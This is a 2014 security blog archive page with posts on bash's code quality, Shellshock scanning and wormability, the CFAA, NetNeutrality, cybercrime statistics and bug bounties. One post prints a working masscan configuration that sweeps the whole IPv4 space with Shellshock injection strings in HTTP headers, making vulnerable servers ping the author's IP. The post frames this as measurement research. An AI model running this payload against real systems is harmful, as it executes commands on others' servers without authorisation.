Saturday, September 27, 2014

The shockingly obsolete code of bash

One of the problems with bash is that it's simply obsolete code. We have modern objective standards about code quality, and bash doesn't meet those standards. In this post, I'm going to review the code, starting with the function that is at the heart of the #shellshock bug, initialize_shell_variables().

K&R function headers


The code uses the K&R function headers which have been obsolete since the mid-1980s.


I don't think it's there to support older compilers, because other parts of the code use modern headers. I think it's there simply because they are paranoid about making unnecessary changes to the code. The effect of this is that it messes up static analysis, both simple compiler warnings as well as advanced security analysis tools.

It's also a stylistic issue. There's only one rule to coding style, which is "avoid surprising things", and this is surprising.

Ultimately, this isn't much of an issue, but a symptom that there is something seriously wrong with this code.

Global variables everywhere


Global variables are bad. Your program should have a maximum of five, for such things as the global debug or logging flag. Bash has hundred(s) of global variables.


Also note that a large number of these globals are defined in the local file, rather than including a common definition from an include file. This is really bad.

Another way of looking at the problem is looking at the functions that operate on global variables. In such cases, the functions have no parameters, as in the following:



Functions with no parameters (void) and no return should be a an extreme rarity in C. It means the function is operating on global variables, or is producing some side effect. Since you should avoid globals and side effects, such functions should virtually never exist. In Bash, such functions are pervasive.

Lol, wat?


The the first step in this function is to initialize the "environmental variables" (the ones that get executed causing the #shellshock vuln), so the first code is a for loop "for all variables". This loop contains a really weird syntax:


This is painful for so many reasons, the most noteworthy of which is that instead of incrementing the index in the third clause of the for loop, that clause is empty and instead the programmer does it in the second clause. In other words, it should look like this:


(Astute readers will note that this change isn't precisely identical, but since 'string_index' is used nowhere else, either inside or after the loop, that slight change in meaning is moot).

There is really no excuse for this sort of programming. In terms of compiler optimizations, it makes no difference in performance. All it does is confuse programmers later who are trying to read your spaghetti code. To be fair, we all have brain farts where we do something weird like this -- but it seems like oddities like this are rather common in bash.

I suspect the reason the programmer did this was because they line was getting rather long, and short lines are easier to read. But the fault here is poor choice of variable names. There is no need to call the index variable 'string_index' since it's used nowhere else except on line 329. In such cases, the variable 'i' is far superior. It communicates to the reader that you are doing the expected thing of simply enumerating 'env[]', and that the index variable is unimportant except as to index things. This is really more of a stylistic issue and isn't terribly important, but I use it to hammer home the point that the less surprising the code, the better. The code should've looked like this:


Finally, the middle clause needs some work. The expected operation here is a comparison not an assignment. This will cause static analyzers to throw up nasty warning messages. I suppose you could call this a "false positive", since the code means to do an assignment here, but here's the rule of modern C programming: you write to make static analyzers happy. Therefore, the code needs to be changed to:


The lesson here is that enumerating over a NULL-terminates list of strings is a damn common pattern in C. The way you do it should look like the same way that everybody does it, and the above snippet code is the pattern that most everyone uses. When you don't do the expected, you confuse everyone, from code reviewers to static analyzers.

No banned functions


Today, we know not to use dangerous functions like strcpy(). strncpy(), sprintf(), and so forth. While these functions can be used safely by careful programmers, it's simply better to ban their use altogether. If you use strcpy(), the code reviewer has to check each and every instance to make sure you've used it safely. If you've used memcpy(), they don't.

The bash code uses these dangerous functions everywhere, as in the following lines:


I've included enough lines to demonstrate that their use of strcpy() is safe (char_index is the length of the name string). But that this particular instance is safe isn't the issue -- the issue is that it's really difficult for code reviewers to verify that it's safe. Simply using the safer 'snprintf()' would've been much easier to verify:


One thing to remember when doing code is that writing it to make it clear to security-reviewers tends to have the effect of making code clearer for everyone else as well. I think the above use of snprintf() is much clearer than strcpy() -- as well as being dramatically safer.

Conclusion


In response to #shellshock, Richard Stallman said the bug was just a "blip". It's not, it's a "blimp" -- a huge nasty spot on the radar warning of big things to come. Three more related bugs have been found, and there are likely more to be found later. The cause isn't that a programmer made a mistake, but that there is a systematic failure in the code -- it's obsolete, having been written to the standards of 1984 rather than 2014.

Where to go from here


So now that we know what's wrong, how do we fix it? The answer is to clean up the technical debt, to go through the code and make systematic changes to bring it up to 2014 standards.

This will fix a lot of bugs, but it will break existing shell-scripts that depend upon those bugs. That's not a problem -- that's what upping the major version number is for. The philosophy of the Linux kernel is a good one to emulate: documented functionality describing how the kernel should behave will be maintained until Linus's death. Undocumented, undefined behavior that stupid programs depend upon won't be maintained. Indeed, that's one of the conflicts between Gnu and Linux: Gnu projects sometimes change documented behavior while at the same time maintaining bug-compatibility.

Bash isn't crypto, but hopefully somebody will take it on as a project, like the LibreSSL cleanup effort.

Friday, September 26, 2014

Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is vaguely written allowing discriminatory prosecution by the powerful, such as when AT&T prosecuted 'weev' for downloading iPad account information that they had made public on their website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it'll give credence to the argument that the law is unconstitutionally vague because I'm obviously not trying to "get away with something".

Thursday, September 25, 2014

Many eyes theory conclusively disproven

Just because a bug was found in open-source does not disprove the "many eyes" theory. Instead, it's bugs being found now that should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim promoted by open-source advocates that "many eyes makes bugs shallow", the theory that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmers writes 10x more code than they read. The only people where that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From bash to OpenSSL to LZO, the evidence is clear: few eyes are looking at open-source.



Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave it's name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, but I hadn't considered that bug before (to my great embarrassment), but of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self evident in the way that CGI scripting worked. I forget the exact details, but it was essentially no different than the classic '/cgi-bin/phf' bug.

So we've known for 20 years that this is a problem, so why does it even happen? I think the problem is that most people don't know how things work. Like the IT guy 20 years ago, they can't look at it and immediately understand the implications and see what's wrong. So, they keep using it. This perpetuates itself into legacy code that we can never get rid of. It's mainframes, 20 years out of date and still a 50-billion dollar a year business for IBM.












Wednesday, September 24, 2014

Bash 'shellshock' bug is wormable

Early results from my scan: there's about 3000 systems vulnerable just on port 80, just on the root "/" URL, without Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses that than.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webserves on odd ports that are the real danger. Scanning for more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly wormable, and can easily worm past firewalls and infect lots of systems. One key question is whether Mac OS X and iPhone DHCP service is vulnerable -- once the worm gets behind a firewall and runs a hostile DHCP server, that would "game over" for large networks.



Update: As many people point out, the path variable isn't set, so I need '/usr/ping' instead to get even more results.

Update: Someone is using masscan to deliver malware. They'll likely have compromised most of the system I've found by tomorrow morning. If they using different URLs and fix the Host field, they'll get tons more.




Bash 'shellshock' scan of the Internet

NOTE: malware is now using this as their User-agent. I haven't run a scan now for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier shows that this bug is widespread:
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash 'shellshock' bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which only affected a specific version of OpenSSL, this bash bug has been around for a long, long time. That means there are lots of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won't be, is much larger than Heartbleed.

There's little need to rush and fix this bug. Your primary servers are probably not vulnerable to this bug. However, everything else probably is. Scan your network for things like Telnet, FTP, and old versions of Apache (masscan is extremely useful for this). Anything that responds is probably an old device needing a bash patch. And, since most of them can't be patched, you are likely screwed.




Update: I think people are calling this the "shellshock" bug. Still looking for official logo.



Update: Note that the thing with the Heartbleed bug wasn't that that the Internet was going to collapse, but that it's in so many places that we really can't eradicate it all. Thus, saying "as bad as Heartbleed" doesn't mean your website is going to get hacked tomorrow, but that a year from now we'll be reading about how hackers got in using the vulnerability to something interesting.



Exploit details: The way this bug is exploited is anything that that first sticks some Internet parameter in an environmental variable, and then executes a bash script. Thus, simply calling bash isn't the problem. Thus, some things (like PHP apparently) aren't necessarily vulnerable, but other things (like CGI shell scripts) are vulnerable as all get out. For example, a lot of wireless routers shell out to "ping" and "traceroute" -- these are all likely vulnerable.




Tuesday, September 23, 2014

EFF, Animal Farm version

In celebration of "Banned Books Week", the EFF has posted a picture of their employees sitting around "reading" banned-books. Amusingly, the person in the back is reading "Animal Farm", a book that lampoons the populist, revolutionary rhetoric the EFF itself uses.

Orwell wrote Animal Farm at the height of World War II, when the Soviet Union was our ally against Germany, and where Stalin was highly regarded by intellectuals. The book attacks Stalin's cult of personality, showing how populist "propaganda controls the opinion of enlightened in democratic countries". In the book, populist phrases like "All animals are equal" over time get amended with such things as "...but some animals are more equal than others".

The hero worship geeks have for the EFF is a modern form of that cult of personality. Computer geeks unquestioningly support the EFF, even when the EFF contradicts themselves. There are many examples, such as supporting coder's rights while simultaneously attacking "unethical" coders. The best example, though, is NetNeutrality, where the EFF wants the government to heavily regulate Internet providers like Comcast. This is a complete repudiation of the EFF's earlier position set forth in their document "Declaration of Independence of Cyberspace".

So I thought I'd amend that document with updated EFF rhetoric:

  • You [governments] are not welcome among us, but corporations are even less welcome.
  • You have no some sovereignty where we gather.
  • You have no moral right to rule us to excess.
  • We did not invite you then, but we invite you now.
  • Do not think that you can build it, as though it were a public construction project. Thanks for building cyberspace, now please run it like a public utility.

Sunday, September 14, 2014

Hacker "weev" has left the United States

Hacker Andrew "weev" Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country:


Thursday, September 11, 2014

Rebuttal to Volokh's CyberVor post

The "Volkh Conspiracy" is a wonderful libertarian law blog. Strangely, in the realm of cyber, Volokh ignores his libertarian roots and instead chooses authoritarian commentators, like NSA lawyer Stewart Baker or former prosecutor Marcus Christian. I suspect Volokh is insecure about his (lack of) cyber-knowledge, and therefore defers to these "experts" even when it goes against his libertarian instincts.

The latest example is a post by Marcus Christian about the CyberVor network -- a network that stole 4.5 billion credentials, including 1.2 billion passwords. The data cited in support of its authoritarianism has little value.

A "billion" credentials sounds like a lot, but in reality, few of those credentials are valid. In a separate incident yesterday, 5 million Gmail passwords were dumped to the Internet. Google analyzed the passwords and found only 2% were valid, and that automated defenses would likely have blocked exploitation of most of them. Certainly, 100,000 valid passwords is a large number, but it's not the headline 5 million number.

That's the norm in cyber. Authoritarian types who want to sell you something can easily quote outrageous headline numbers, and while others can recognize the data are hyped, few have the technical expertise to adequately rebut them. I speak at hacker conferences on the topic of password hacking [1] [2]; I can assure you those headline numbers are grossly inflated. They may be true after a fashion, but they do no imply what you think they do.

That blog post also cites a study by CSIS/McAfee claiming the economic cost of cybercrime is $475 billion per year. This number is similarly inflated, between 10 to 100 times.

We know the sources of income for hackers, such as credit card fraud, ransomware, and DDoS extortion. Of these, credit card fraud is by far the leading source of income. According to a July 2014 study by the US DoJ and FTC, all credit card fraud world-wide amounts to $5.55 billion per year. Since we know that less than half of this is due to hackers, and that credit card fraud is more than half of what hackers earn, this sets the upper limit on hacker income -- about 1% of what CSIS/McAfee claim as the cost of cybercrime. Of course, the costs incurred by hackers can be much higher than their income, but knowing their income puts us in the right ballpark.

Where CSIS/McAfee get their eye-popping numbers is vague estimates about such things as "loss of reputation" and "intellectual property losses". These numbers are arbitrary, depending upon a wide range of assumptions. Since we have no idea where they get such numbers, we can't put much faith in them.

Some of what they do divulge about their methods is obviously flawed. For example, when discussing why some countries don't report cybercrime losses, they say:
that some countries are miraculously unaffected by cybercrime despite having no better defenses than countries with similar income levels that suffer higher loss—seems improbable
This is wrong for two enormous reasons.

I developed a popular tool for scanning the Internet, and use it often to scan everything. Among the things this has taught me is that countries vary enormously, both in the way they exploit the Internet and in their "defenses". Two neighboring countries with similar culture and economic development can nonetheless vary widely in their Internet usage. In my person experience, it is not improbable that two countries with similar income levels will suffer different losses.

The second reason the above statement is wrong is their view of "defenses", as if the level of defense (anti-virus, firewalls, intrusion prevention) has a bearing on rates of hacking. It doesn't. It's like cars: what matters most as to whether you die in an accident is how often you drive, how far, where, and how good a driver you are. What matters less are "defenses" like air bags and anti-lock brakes. That's why automobile death rates in America correlate with things like recessions, the weather, building of freeways, and cracking down on dunk drivers. What they don't correlate with are technological advances in "defenses" like air bags. These "defenses" aren't useless, of course, but drivers respond by driving more aggressively and paying less attention to the road. The same is true in cyber, technologies like intrusion prevention aren't a magic pill that ward off hackers, but a tool that allows increased risk taking and different tradeoffs when exploiting the Internet. What you get from better defenses is increased profits from the Internet, rather than decreased losses. I say this as the inventor of the "intrusion prevention system", a popular cyber-defense that is now a $2 billion/year industry.

That McAfee and CSIS see "defenses" the wrong way reflects the fact that McAfee wants to sell "defensive" products, and CSIS wants to sell authoritarian legislation. Their report is not an honest assessment from experts, but an attempt to persuading people into buying what these organizations have to sell.

By the way, that posts mentions "SQL injection". It's a phrase you should pay attention to because it's been the most common way of hacking websites for over a decade. It's so easy teenagers with little skill can do SQL injection to hack websites. It's also easily preventable, just use a thing called "parameterized queries" instead of a thing called "string pasting". Yet, schools keep pumping out website designers that know nothing of SQL injection and who "paste strings" together. This leads to the intractable problem that if you hire a university graduate to do your website, they'll put SQL injection flaws in the code that your neighbor's kid will immediately hack. Companies like McAfee try to sell you defenses like "WAFs" that only partly defend against the problem. The solution isn't adding "defenses" like WAFs, but to change the code from "string pasting" to "parameterized queries" which does completely prevent the problem. That our industry thinks in terms of "adding defenses" from vendors like McAfee, instead of just fixing the problem, is why cybersecurity has become intractable in recent years.

Marcus Christian's post ends with the claim that "law enforcement agencies must assume broader roles and bear greater burdens", that "individual businesses cannot afford to face cybercriminals alone", and then paraphrases text of recently proposed cybersecurity legislation. If you are libertarian, you should oppose this legislation. It's a power grab, increasing your own danger from law enforcement, and doing nothing to lessen the danger from hackers. I'm an expert in cybersecurity who helps companies defend against hackers, yet I'm regularly threatened and investigated by law enforcement thugs. They don't understand what I do, it's all witchcraft to them, so they see me as part of the problem rather than the solution. Law enforcement already has too much power in cyberspace, it needs to be rolled back, not extended.


In conclusion, rather than an "analysis" as Eugene Volokh claims, this post from Marcus Christian was transparent lobbying for legislation, with the standard distortion of data that the word "lobbying" implies. Readers of that blog shouldn't treat it as anything more than that.

Wednesday, September 10, 2014

What they claim about NetNeutrality is a lie

The EFF and other activists are promoting NetNeutrality in response the to FCC's request for comment. What they tell you is a lie. I thought I’d write up the major problems with their arguments.


“Save NetNeutrality”


Proponents claim they are trying to “save” NetNeutrality and preserve the status quo. This is a bald-faced lie.

The truth is that NetNeutrality is not now, nor has it ever been, the law. Fast-lanes have always been the norm. Most of your network traffic goes through fast-lanes (“CDNs”), for example.

The NPRM (the FCC request for comments we are all talking about here) quite clearly says: "Today, there are no legally enforceable rules by which the Commission can stop broadband providers from limiting Internet openness".

NetNeutrality means a radical change, from the free-market Internet we’ve had for decades to a government regulated utility like electricity, water, and sewer. If you like how the Internet has been running so far, then you should oppose the radical change to NetNeutrality.


“NetNeutrality is technical”


Proponents claim there is something “technical” about NetNeutrality, that the more of a geek/nerd you are, the more likely you are to support it. They claim NetNeutrality supporters have some sort of technical authority on the issue. This is a lie.

The truth is that NetNeutrality is pure left-wing dogma. That’s why the organizations supporting it are all well-known left-wing organizations, like Greenpeace, Daily Kos, and the EFF. You don’t see right-wing or libertarian organizations on the list supporting today’s protest. In contrast, other issues like the "SOPA blackout" and protests against the NSA enjoy wide bi-partisan support among right-wing, libertarian, and left-wing groups.

Your support of NetNeutrality correlates with your general political beliefs, not with your technical skill. One of the inventors of TCP/IP is Vint Cerf who supports NetNeutrality – and a lot of other left-wing causes. Another inventor is Bob Kahn, who opposes NetNeutrality and supports libertarian causes.

NetNeutrality is a political slogan only. It has as much technical meaning has "Hope and Change". Ask 10 people what the phrase technically means and you'll get 13 answers.

The only case where NetNeutrality correlates with technical knowledge is among those geeks who manage networks – and it’s an inverse correlation (they oppose it). That’s because they want technologists and not politicians deciding how to route packets.


“Fast lanes will slow down the Internet”


Proponents claim that fast-lanes for some will mean slow-lanes for everyone else. The opposite is true – the Internet wouldn’t work without fast lanes, because they shunt high-volume traffic off expensive long-distance links.

The fundamental problem with the Internet is the “tragedy of the commons” where a lot of people freeload off the system. This discourages investment needed to speed things up. Charging people for fast-lanes fixes this problem – it charges those willing to pay for faster speeds in order to invest in making the Internet faster. Everyone benefits – those in the new fast-lane, and those whose slow-lanes become less congested.

This is proven by “content delivery networks” or “CDNs”, which are the most common form of fast lanes. (Proponents claim that CDNs aren’t the fast lanes they are talking about, but that too is a lie). Most of your network traffic doesn’t go across long-distance links to place like Silicon Valley. Instead, most of it goes to data centers in your local city to these CDNs. Companies like Apple and Facebook maintain their own CDNs, others like Akamai and Lightspeed charge customers the privilege to be hosted on their CDNs. CDNs are the very essence of fast lanes, and the Internet as we know it wouldn’t happen without them.


“Bad things will happen”


NetNeutrality proponents claim bad things will happen in the future. These are lies, made-up stories designed to frighten you. You know they are made-up stories because NetNeutrality has never been the law, and the scary scenarios haven’t come to pass.

The left-wingers may be right, and maybe the government does indeed need to step in and regulate the Internet like a utility. But, we should wait for problems that arise and fix them – not start regulating to prevent bad things that would never actually occur. It’s the regulation of unlikely scenarios that is most likely to kill innovation on the future Internet. Today, corporations innovate first and ask forgiveness later, which is a far better model than having to ask a government bureaucrat whether they are allowed to proceed – then proceeding anyway by bribing or lobbying the bureaucrats.


“Bad things have happened”


Proponents claim that a few bad things have already happened. This is a lie, because they are creating a one-sided description of events.

For example, a few years ago, Comcast filtered BitTorrent traffic in a clear violation of NetNeutrality ideals. This was simply because the network gets overloaded during peak hours (5pm to 9pm) and BitTorrent users don’t particularly care about peak hours. Thus, by slowing down BitTorrent during peak hours, Comcast improved the network for everyone without inconveniencing BitTorrent users. It was a win-win solution to the congestion problem.

NetNeutrality activists hated the solution. Their furor caused Comcast to change their policy, no longer filtering BitTorrent, but imposing a 250gig bandwidth cap on all their users instead. This was a lose-lose solution, both BitTorrent users and Comcasts normal customers hated the solution – but NetNeutrality activists accepted it.

NetNeutrality activists describe the problem as whether or not Comcast should filter BitTorrent, as if filtering/not-filtering where the only two choices. That's a one-sided description of the problem. Comcast has a peak-hour congestion problem. The choices are to filter BitTorrent, impose bandwidth caps, bill by amount downloaded, bill low-bandwidth customers in order subsidize high-bandwidth customers, cause all customers to suffer congestion, and so on. By giving a one-sided description of the problem, NetNeutrality activists make it look like Comcast was evil for choosing a bad solution to the problem, but in truth, all alternatives are bad.

A similar situation is the dispute between NetFlix and Comcast. NetFlix has been freeloading off the system, making the 90% of low-bandwidth customers subsidize the 10% who do streaming video. Comcast is trying to make those who do streaming to pay for the costs involved. They are doing so by making NetFlix use CDNs like all other heavy users of the network. Activists take a very narrow view of this, casting Comcast as the bad guy, but any technical analysis of the situation shows that NetFlix is the bad guy freeloading on the system, and Comcast is the good guy putting a stop to it.

Companies like Comcast must solve technical problems. NetNeutrality deliberately distorts the description of the problems in order to make corporations look evil. Comcast certainly has monopolies in big cities on broadband (above 10mbps) Internet and we should distrust them, but the above examples were decided on technical grounds, not on rent-seeking monopolist grounds.


Conclusion


I’m not trying to sway your opinion on NetNeutrality, though of course it’s quite clear I oppose it. Instead, I’m trying to prove that the activists protesting today are liars. NetNeutrality isn’t the status quo or the current law, it’s not being “saved”. NetNeutrality is pure left-wing politics, not technical, and activists have no special technical authority on the issue. Fast-lanes are how the Internet works, they don’t cause slow-lanes for everyone else. The activists stories of future doom are designed to scare you and aren’t realistic, and their stories of past problems are completely distorted.





Frankly, activists are dishonest with themselves, as shown in the following tweet. In their eyes, Comcast is evil and "all about profits" because they lobby against NetNeutrality, while NetFlix is arresponsible/good company because they support NetNeutrality. But of course, we all know that NetFlix is likewise "all about profits", and their support for NetNeutrality is purely because they will profit by it.





Thursday, September 04, 2014

Vuln bounties are now the norm

When you get sued for a cybersecurity breach (such as in the recent Home Depot case), one of the questions will be "did you follow industry norms?". Your opposition will hire expert witnesses like me to say "no, they didn't".

One of those norms you fail at is "Do you have a vuln bounty program?". These are programs that pay hackers to research and disclose vulnerabilities (bugs) in their products/services. Such bounty programs have proven their worth at companies like Google and Mozilla, and have spread through the industry. The experts in our industry agree: due-diligence in cybersecurity means that you give others an incentive to find and disclose vulnerabilities. Contrariwise, anti-diligence is threatening, suing, and prosecuting hackers for disclosing your vulnerabilities.

There are now two great bounty-as-a-service*** companies "HackerOne" and "BugCrowd" that will help you run such a program. I don't know how much it costs, but looking at their long customer lists, I assume it's not too much.

I point this out because a lot of Internet companies have either announced their own programs, or signed onto the above two services, such as the recent announcement by Twitter. All us experts think it's a great idea and that the tradeoffs are minor. I mean, a lot of us understand tradeoffs, such as why HTTPS is difficult for your website -- we don't see important tradeoffs for vuln bounties. It is now valid to describe this as a "norm" for cybersecurity.




By the way, I offer $100 in BitCoin for vulns in my tools that I publish on GitHub:
https://github.com/robertdavidgraham



*** Hacker1 isn't a "bounty-as-a-service" company but a "vuln coordination". However, all the high-profile customers they highlight offer bounties, so it comes out to much the same thing. They might not handle the bounties directly, but they are certainly helping the bounty process.




Update: One important tradeoff is that is that such bounty programs attract a lot of noise from idiots, such as "your website doesn't use SSL, now gimme my bounty" [from @beauwoods]. Therefore, even if you have no vulnerabilities, there is some cost to such programs. That's why BugCrowd and Hacker1 are useful: they can more efficiently sift through the noise than your own organization. However, this highlights a problem in your organization: if you don't have the expertise to filter through such noise (and many organizations don't), then you don't have the expertise to run a bug bounty program. However, this also means you aren't in a position to be trusted.

Update: Another cost [from @JardineSoftware] is that by encouraging people to test your site, you'll increase the number of false-positives on your IDS. It'll be harder now to distinguish testers from attackers. That's not a concern: the real issue is that you spend far too much time looking at inbound attacks already and not enough at successful outbound exfiltration of data. If encouraging testers doubles the number of IDS alerts, then that's a good thing not a bad thing.

Update: You want to learn about cybersecurity? Then just read what's in/out of scope for the Yahoo! bounty: https://hackerone.com/yahoo